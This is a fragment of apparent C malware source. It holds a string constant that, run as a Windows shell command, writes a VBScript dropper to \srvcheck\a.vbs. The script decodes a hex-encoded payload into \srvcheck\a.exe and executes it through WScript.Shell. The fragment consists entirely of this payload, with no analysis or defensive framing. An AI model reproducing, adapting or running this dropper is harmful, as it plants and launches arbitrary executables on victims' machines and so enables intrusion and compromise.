00534 "echo Set n = o.CreateTextFile(\"\\srvcheck\\a.exe\", ForWriting) : i = 1 : while i ^< len(t)>>\\srvcheck\\a.vbs && "
00535 "echo f = Int(\"&H\" ^& Mid(t, i, 2)) : n.Write(Chr(f)) : i = i+2 : WEnd : n.Close>>\\srvcheck\\a.vbs && "
00536 "echo Set s=CreateObject(\"WScript.Shell\") : s.run(\"\\srvcheck\\a.exe\")>>\\srvcheck\\a.vbs &&"
00537 "\\srvcheck\\a.vbs /B";
00538
00539
00540 #endif